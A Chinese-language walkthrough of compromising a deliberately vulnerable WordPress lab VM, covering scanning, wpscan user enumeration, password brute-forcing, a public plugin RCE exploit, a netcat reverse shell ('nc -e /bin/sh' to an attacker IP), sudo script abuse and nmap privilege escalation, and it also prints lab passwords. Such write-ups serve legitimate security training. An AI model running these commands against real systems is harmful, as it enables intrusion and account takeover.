一、主机发现
arp-scan -l
靶机ip为192.168.55.159
二、端口扫描、目录枚举、指纹识别、
2.1端口扫描
nmap 192.168.55.159
发现没有开放特殊端口
看来信息收集的重点要放在网页中了
2.2目录枚举
dirb http://192.168.55.159
2.3指纹识别
nmap 192.168.55.159 -sV -sC -O --version-all
三、进入靶机网页进行信息收集、反弹shell
此靶机需要域名映射,下载靶机时作者给出了方法,不再赘述
发现靶机的网页是wordpress
可以尝试wpscan工具对网站进行扫描
wpscan --url http://wordy/
发现wordpress的版本为5.1.1
尝试枚举用户名
wpscan --url http://wordy --enumerate u
枚举出来了5个用户名
接下来尝试使用密码字典进行爆破(下载地址中作者给出了相应的字典)
cp /usr/share/wordlists/rockyou.txt 1.txt (先将该密码复制到桌面上)
cat 1.txt | grep k01 > 2.txt (根据作者提示筛选密码)
已经爆破出来了一个账号密码
mark
helpdesk01
成功进入靶机后台
发现了wordpress的一个插件
在kali中找此插件的漏洞
searchsploit Activity monitor
发现有远程代码执行漏洞
直接执行该exp即可,拿下低权限shell
python 50110.py
四、nmap提权
发现这个shell不稳定,使用cd命令就自动退出
重新反弹一个shell
nc -lvvp 4444
nc -e /bin/sh 192.168.55.132 4444
python -c "import pty;pty.spawn('/bin/bash')"
4.1靶机信息收集
uname -a
lsb_release -a
筛选一下SUID命令,尝试一下suid提权
find / -perm -4000 -print 2>/dev/null
发现没有常用的命令,尝试其他思路
4.2登陆graham用户
进入home目录,发现靶机一共有四个用户
其中jens用户目录下有一个备份文件,此备份文件的权限很高,感觉此备份文件可能可以提权,尝试运行,发现无权限
继续查看其它用户的目录下的信息,发现mark用户下有一个员工的文件,看看里面的内容
发现graham用户的账号和密码
su graham
GSo7isUM1D4
4.3登陆jens用户
查看graham用户的sudo命令权限,发现jens用户不需要密码即可登陆
sudo -l
graham用户的权限能够使用backups.sh
将切换jens用户的命令追加到backup.sh中
echo '/bin/bash' >>backups.sh
sudo -u jens ./backups.sh
4.4nmap提权
一样的套路发现nmap这个命令没有密码
去提权网站查找namp提权的方式
尝试使用命令进行提权
提权成功!
